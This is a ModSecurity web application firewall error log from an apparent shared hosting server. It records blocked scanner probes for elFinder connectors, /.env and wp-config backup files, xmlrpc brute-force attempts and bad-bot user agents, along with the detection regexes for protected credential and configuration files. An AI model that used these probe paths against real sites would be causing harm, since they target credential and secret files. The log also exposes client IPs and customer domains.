[Tue May 26 14:41:40.675229 2026] [security2:error] [pid 636820:tid 637069] [client 108.136.162.67:53989] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 67.162.136.108.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "anujtradingco.com"] [uri "/assets/vendor/elfinder/php/connector.minimal.php"] [unique_id "ahVjzK_r6oOphPch7B97BAAAAHc"]
[Tue May 26 14:41:40.928412 2026] [security2:error] [pid 636820:tid 637037] [client 216.244.66.241:38768] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "ghanemgh.com"] [uri "/gsis/exam/past-entrance-exam/"] [unique_id "ahVjzK_r6oOphPch7B97CwAAAFc"]
[Tue May 26 14:41:40.928535 2026] [security2:error] [pid 636820:tid 637037] [client 216.244.66.241:38768] ModSecurity: Warning. Matched phrase "Dotbot" at REQUEST_HEADERS:User-agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "ghanemgh.com"] [uri "/gsis/exam/past-entrance-exam/"] [unique_id "ahVjzK_r6oOphPch7B97CwAAAFc"]
[Tue May 26 14:41:41.444962 2026] [security2:error] [pid 636820:tid 637076] [client 108.136.162.67:54095] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 67.162.136.108.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "anujtradingco.com"] [uri "/admin/elfinder/php/connector.minimal.php"] [unique_id "ahVjza_r6oOphPch7B97IAAAAH4"]
[Tue May 26 14:41:41.753931 2026] [security2:error] [pid 636820:tid 637055] [client 57.141.2.24:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVjza_r6oOphPch7B97FQAAAGk"]
[Tue May 26 14:41:42.044210 2026] [security2:error] [pid 636820:tid 637057] [client 216.244.66.241:38770] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "ghanemgh.com"] [uri "/liver-net/seminar/"] [unique_id "ahVjzq_r6oOphPch7B97PgAAAGs"]
[Tue May 26 14:41:42.044349 2026] [security2:error] [pid 636820:tid 637057] [client 216.244.66.241:38770] ModSecurity: Warning. Matched phrase "Dotbot" at REQUEST_HEADERS:User-agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "ghanemgh.com"] [uri "/liver-net/seminar/"] [unique_id "ahVjzq_r6oOphPch7B97PgAAAGs"]
[Tue May 26 14:41:42.084111 2026] [security2:error] [pid 636820:tid 636987] [client 176.65.139.237:56434] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "keyamind.com.svijaykumar.in"] [uri "/.env"] [unique_id "ahVjzq_r6oOphPch7B97PwAAACU"]
[Tue May 26 14:41:42.237482 2026] [security2:error] [pid 636820:tid 637039] [client 108.136.162.67:54189] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 67.162.136.108.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "anujtradingco.com"] [uri "/backend/elfinder/php/connector.minimal.php"] [unique_id "ahVjzq_r6oOphPch7B97QwAAAFk"]
[Tue May 26 14:41:43.033244 2026] [security2:error] [pid 636820:tid 636977] [client 108.136.162.67:54297] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 67.162.136.108.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "anujtradingco.com"] [uri "/public/elfinder/php/connector.minimal.php"] [unique_id "ahVjz6_r6oOphPch7B97XQAAABs"]
[Tue May 26 14:41:43.140115 2026] [security2:error] [pid 636820:tid 637071] [client 216.244.66.241:38786] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "ghanemgh.com"] [uri "/mahou/"] [unique_id "ahVjz6_r6oOphPch7B97YAAAAHk"]
[Tue May 26 14:41:43.140259 2026] [security2:error] [pid 636820:tid 637071] [client 216.244.66.241:38786] ModSecurity: Warning. Matched phrase "Dotbot" at REQUEST_HEADERS:User-agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "ghanemgh.com"] [uri "/mahou/"] [unique_id "ahVjz6_r6oOphPch7B97YAAAAHk"]
[Tue May 26 14:41:43.803721 2026] [security2:error] [pid 636820:tid 637028] [client 57.141.2.47:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVjz6_r6oOphPch7B97ZgAAAE4"]
[Tue May 26 14:41:43.822000 2026] [security2:error] [pid 636820:tid 637043] [client 108.136.162.67:54369] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 67.162.136.108.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "anujtradingco.com"] [uri "/vendor/studio-42/elfinder/php/connector.minimal.php"] [unique_id "ahVjz6_r6oOphPch7B97cQAAAF0"]
[Tue May 26 14:41:44.230072 2026] [security2:error] [pid 636820:tid 636964] [client 216.244.66.241:47048] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "ghanemgh.com"] [uri "/members/supporting-member/"] [unique_id "ahVj0K_r6oOphPch7B97egAAAA4"]
[Tue May 26 14:41:44.230175 2026] [security2:error] [pid 636820:tid 636964] [client 216.244.66.241:47048] ModSecurity: Warning. Matched phrase "Dotbot" at REQUEST_HEADERS:User-agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "ghanemgh.com"] [uri "/members/supporting-member/"] [unique_id "ahVj0K_r6oOphPch7B97egAAAA4"]
[Tue May 26 14:41:44.687756 2026] [security2:error] [pid 636820:tid 637020] [client 108.136.162.67:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahVj0K_r6oOphPch7B97iQAAAEY"]
[Tue May 26 14:41:45.213616 2026] [security2:error] [pid 636820:tid 637077] [client 57.141.2.2:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVj0K_r6oOphPch7B97kQAAAH8"]
[Tue May 26 14:41:45.218792 2026] [security2:error] [pid 636820:tid 636990] [client 108.136.162.67:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahVj0a_r6oOphPch7B97qAAAACg"]
[Tue May 26 14:41:45.548119 2026] [security2:error] [pid 636820:tid 637069] [client 108.136.162.67:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahVj0a_r6oOphPch7B97sQAAAHc"]
[Tue May 26 14:41:45.889364 2026] [security2:error] [pid 636820:tid 636967] [client 108.136.162.67:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahVj0a_r6oOphPch7B97xwAAABE"]
[Tue May 26 14:41:46.217452 2026] [security2:error] [pid 636820:tid 637070] [client 108.136.162.67:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahVj0q_r6oOphPch7B970wAAAHg"]
[Tue May 26 14:41:46.555711 2026] [security2:error] [pid 636820:tid 637043] [client 108.136.162.67:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahVj0q_r6oOphPch7B973AAAAF0"]
[Tue May 26 14:41:46.931937 2026] [security2:error] [pid 636820:tid 637025] [client 108.136.162.67:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahVj0q_r6oOphPch7B977AAAAEs"]
[Tue May 26 14:41:47.270345 2026] [security2:error] [pid 636820:tid 636965] [client 108.136.162.67:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahVj06_r6oOphPch7B979gAAAA8"]
[Tue May 26 14:41:47.597947 2026] [security2:error] [pid 636820:tid 637013] [client 108.136.162.67:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahVj06_r6oOphPch7B98AgAAAD8"]
[Tue May 26 14:41:47.931872 2026] [security2:error] [pid 636820:tid 637011] [client 108.136.162.67:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahVj06_r6oOphPch7B98EQAAAD0"]
[Tue May 26 14:41:48.203709 2026] [security2:error] [pid 636820:tid 636955] [client 57.141.2.19:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVj06_r6oOphPch7B98CwAAAAU"]
[Tue May 26 14:41:48.279895 2026] [security2:error] [pid 636820:tid 637062] [client 108.136.162.67:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahVj1K_r6oOphPch7B98JQAAAHA"]
[Tue May 26 14:41:48.623901 2026] [security2:error] [pid 636820:tid 637038] [client 108.136.162.67:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahVj1K_r6oOphPch7B98MgAAAFg"]
[Tue May 26 14:41:48.886246 2026] [security2:error] [pid 636820:tid 636968] [client 202.141.83.254:19958] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 254.83.141.202.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahVj1K_r6oOphPch7B98OwAAABI"]
[Tue May 26 14:41:48.886351 2026] [security2:error] [pid 636820:tid 636968] [client 202.141.83.254:19958] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahVj1K_r6oOphPch7B98OwAAABI"]
[Tue May 26 14:41:48.956793 2026] [security2:error] [pid 636820:tid 637015] [client 108.136.162.67:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahVj1K_r6oOphPch7B98PAAAAEE"]
[Tue May 26 14:41:49.287888 2026] [security2:error] [pid 636820:tid 637073] [client 108.136.162.67:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahVj1a_r6oOphPch7B98RQAAAHs"]
[Tue May 26 14:41:49.673214 2026] [security2:error] [pid 636820:tid 636980] [client 108.136.162.67:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahVj1a_r6oOphPch7B98UwAAAB4"]
[Tue May 26 14:41:49.897182 2026] [security2:error] [pid 636820:tid 636962] [client 57.141.2.23:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVj1a_r6oOphPch7B98TgAAAAw"]
[Tue May 26 14:41:50.004966 2026] [security2:error] [pid 636820:tid 637062] [client 108.136.162.67:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahVj1a_r6oOphPch7B98YAAAAHA"]
[Tue May 26 14:41:50.335840 2026] [security2:error] [pid 636820:tid 637061] [client 108.136.162.67:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahVj1q_r6oOphPch7B98ZwAAAG8"]
[Tue May 26 14:41:50.671229 2026] [security2:error] [pid 636820:tid 636997] [client 108.136.162.67:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahVj1q_r6oOphPch7B98dwAAAC8"]
[Tue May 26 14:41:51.063951 2026] [security2:error] [pid 636820:tid 636980] [client 108.136.162.67:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahVj16_r6oOphPch7B98jQAAAB4"]
[Tue May 26 14:41:51.404371 2026] [security2:error] [pid 636820:tid 637000] [client 108.136.162.67:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahVj16_r6oOphPch7B98mgAAADI"]
[Tue May 26 14:41:51.542424 2026] [security2:error] [pid 636820:tid 636961] [client 57.141.2.47:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVj16_r6oOphPch7B98kAAAAAs"]
[Tue May 26 14:41:51.751465 2026] [security2:error] [pid 636820:tid 637051] [client 108.136.162.67:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahVj16_r6oOphPch7B98rgAAAGU"]
[Tue May 26 14:41:52.131559 2026] [security2:error] [pid 636820:tid 636997] [client 108.136.162.67:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahVj2K_r6oOphPch7B98twAAAC8"]
[Tue May 26 14:41:52.492010 2026] [security2:error] [pid 636820:tid 636979] [client 108.136.162.67:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahVj2K_r6oOphPch7B98yAAAAB0"]
[Tue May 26 14:41:52.822853 2026] [security2:error] [pid 636820:tid 637072] [client 108.136.162.67:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahVj2K_r6oOphPch7B980QAAAHo"]
[Tue May 26 14:41:53.160656 2026] [security2:error] [pid 636820:tid 637000] [client 108.136.162.67:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahVj2a_r6oOphPch7B982gAAADI"]
[Tue May 26 14:41:53.486316 2026] [security2:error] [pid 636820:tid 636982] [client 108.136.162.67:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahVj2a_r6oOphPch7B987gAAACA"]
[Tue May 26 14:41:53.839882 2026] [security2:error] [pid 636820:tid 637071] [client 108.136.162.67:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahVj2a_r6oOphPch7B988wAAAHk"]
[Tue May 26 14:41:54.177249 2026] [security2:error] [pid 636820:tid 636976] [client 108.136.162.67:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahVj2q_r6oOphPch7B99AAAAABo"]
[Tue May 26 14:41:54.186491 2026] [security2:error] [pid 636820:tid 637038] [client 57.141.2.41:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVj2a_r6oOphPch7B989AAAAFg"]
[Tue May 26 14:41:54.513975 2026] [security2:error] [pid 636820:tid 637033] [client 108.136.162.67:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahVj2q_r6oOphPch7B99CQAAAFM"]
[Tue May 26 14:41:55.106136 2026] [security2:error] [pid 636820:tid 637004] [client 108.136.162.67:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahVj26_r6oOphPch7B99HAAAADY"]
[Tue May 26 14:41:55.436213 2026] [security2:error] [pid 636820:tid 637040] [client 108.136.162.67:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahVj26_r6oOphPch7B99KAAAAFo"]
[Tue May 26 14:41:55.786978 2026] [security2:error] [pid 636820:tid 636967] [client 108.136.162.67:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahVj26_r6oOphPch7B99NAAAABE"]
[Tue May 26 14:41:56.146025 2026] [security2:error] [pid 636820:tid 637030] [client 108.136.162.67:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahVj3K_r6oOphPch7B99RgAAAFA"]
[Tue May 26 14:41:56.179203 2026] [security2:error] [pid 636820:tid 637039] [client 57.141.2.24:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVj26_r6oOphPch7B99OQAAAFk"]
[Tue May 26 14:41:56.480920 2026] [security2:error] [pid 636820:tid 636994] [client 108.136.162.67:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahVj3K_r6oOphPch7B99TgAAACw"]
[Tue May 26 14:41:56.809614 2026] [security2:error] [pid 636820:tid 637041] [client 108.136.162.67:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahVj3K_r6oOphPch7B99XAAAAFs"]
[Tue May 26 14:41:57.146441 2026] [security2:error] [pid 636820:tid 637046] [client 108.136.162.67:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahVj3a_r6oOphPch7B99ZQAAAGA"]
[Tue May 26 14:41:57.193416 2026] [proxy:warn] [pid 636820:tid 636956] [client 43.156.66.8:34364] AH01092: no HTTP 0.9 request (with no host line) on incoming request and preserve host set forcing hostname to be thedebateafrica.org for uri /400.shtml
[Tue May 26 14:41:57.488297 2026] [security2:error] [pid 636820:tid 636964] [client 108.136.162.67:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahVj3a_r6oOphPch7B99dAAAAA4"]
[Tue May 26 14:41:57.744923 2026] [security2:error] [pid 636820:tid 637034] [client 108.136.162.67:54444] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-config\\\\.php(?:\\\\W[a-z]*|bak)" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "300"] [id "900256"] [msg "Wp-Config Backup/edit file request"] [hostname "anujtradingco.com"] [uri "/wp-config.php.bak"] [unique_id "ahVj3a_r6oOphPch7B99fwAAAFQ"]
[Tue May 26 14:41:57.773686 2026] [security2:error] [pid 636820:tid 637071] [client 148.224.9.250:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVj3a_r6oOphPch7B99bQAAAHk"]
[Tue May 26 14:41:58.175283 2026] [security2:error] [pid 636820:tid 636968] [client 193.203.167.193:59362] ModSecurity: Warning. Matched phrase "Disco" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "200"] [hostname "businessclubinternational.net"] [uri "/index.html"] [unique_id "ahVj3q_r6oOphPch7B99jgAAABI"]
[Tue May 26 14:41:58.401141 2026] [security2:error] [pid 636820:tid 637038] [client 57.141.2.22:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVj3a_r6oOphPch7B99hQAAAFg"]
[Tue May 26 14:41:58.564752 2026] [security2:error] [pid 636820:tid 637047] [client 108.136.162.67:56488] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-config\\\\.php(?:\\\\W[a-z]*|bak)" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "300"] [id "900256"] [msg "Wp-Config Backup/edit file request"] [hostname "anujtradingco.com"] [uri "/wp-config.php.save"] [unique_id "ahVj3q_r6oOphPch7B99kwAAAGE"]
